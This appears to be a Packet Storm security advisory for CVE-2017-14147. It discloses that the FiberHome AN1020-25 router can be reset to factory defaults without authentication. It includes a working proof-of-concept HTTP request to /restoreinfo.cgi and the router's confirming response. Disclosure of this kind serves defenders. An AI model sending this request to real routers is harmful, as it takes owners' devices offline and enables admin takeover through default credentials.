Exploit the possiblities

FiberHome Unauthenticated ADSL Router Factory Reset

FiberHome Unauthenticated ADSL Router Factory Reset
Posted Sep 6, 2017
Authored by Ibad Shah

FiberHome suffers from an unauthenticated ADSL router factory reset vulnerability.

tags | exploit, bypass
advisories | CVE-2017-14147
MD5 | 1f1aebe9984030ffad3264aab7615426

FiberHome Unauthenticated ADSL Router Factory Reset

Change Mirror Download
Title:
====

FiberHome Unauthenticated ADSL Router Factory Reset.

Credit:
======

Name: Ibad Shah
Twitter: @BeeFaauBee09
Website: beefaaubee09.github.io


CVE:
=====

CVE-2017-14147

Date:
====

05-09-2017 (dd/mm/yyyy)

About FiberHome:
======

FiberHome Technologies is a leading equipment vendor and global solution provider the field of information technology and telecommunications. FiberHome Deals in fiber-optic communications, data networking communications, wireless communication, and intelligentizing applications. In particular, it has been providing end-to-end solutions integrated with opto-electronic devices, opticpreforms, fiber & cables, and optical communication systems to many countries around the world.

Products & Services:
Wireless 3G/4G broadband devices
Custom engineered technologies
Broadband devices

URL : http://www.fiberhomegroup.com/


Description:
=======

This vulnerability in AN1020-25 router enables an anonymous unauthorized attacker to bypass authentication & access Resetting Router to Factory Settings, resulting in un-authorized operation & resetting it to Factory state. It later allows attacker to login to Router's Main Page with default username & password.



Affected Device Model:
=============

FiberHome ADSL AN1020-25


Exploitation-Technique:
===================

Remote


Details:
=======

Below listed vulnerability enables an anonymous unauthorized attacker to reset router to it's factory settings & further access router admin page with default credentials.

1) Bypass authentication and gain unauthorized access vulnerability - CVE-2017-14147

Vulnerable restoreinfo.cgi



Proof Of Concept:
================

PoC :

GET /restoreinfo.cgi HTTP/1.1
Host: 192.168.1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close


HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Sat, 01 Jan 2000 00:12:39 GMT
Content-Type: text/html
Connection: close

<html>
<head>
<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
<link rel=stylesheet href='stylemain.css' type='text/css'>
<link rel=stylesheet href='colors.css' type='text/css'>
<script language="javascript">
<!-- hide

function restore() {
var enblPopWin = '0';
var loc = 'main.html';
var code = 'window.top.location="' + loc + '"';

if ( enblPopWin == '1' ) {
loc = 'index.html';
code = 'location="' + loc + '"';
}

eval(code);
}

function frmLoad() {
setTimeout("restore()", 60000);
}

// done hiding -->
</script>
</head>

<body onLoad='frmLoad()'>
<blockquote>
<b>DSL Router Restore</b><br><br>
The DSL Router configuration has been restored to default settings and the
router is rebooting.<br><br>
Close the DSL Router Configuration window and wait for 2 minutes before
reopening your web browser. If necessary, reconfigure your PC's IP address to
match your new configuration.
</blockquote>
</body>
</html>



Credits:
=======

Ibad Shah, Taimooor Zafar, Owais Mehtab

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    15 Files
  • 2
    Dec 2nd
    2 Files
  • 3
    Dec 3rd
    1 Files
  • 4
    Dec 4th
    15 Files
  • 5
    Dec 5th
    15 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    17 Files
  • 8
    Dec 8th
    15 Files
  • 9
    Dec 9th
    13 Files
  • 10
    Dec 10th
    4 Files
  • 11
    Dec 11th
    28 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close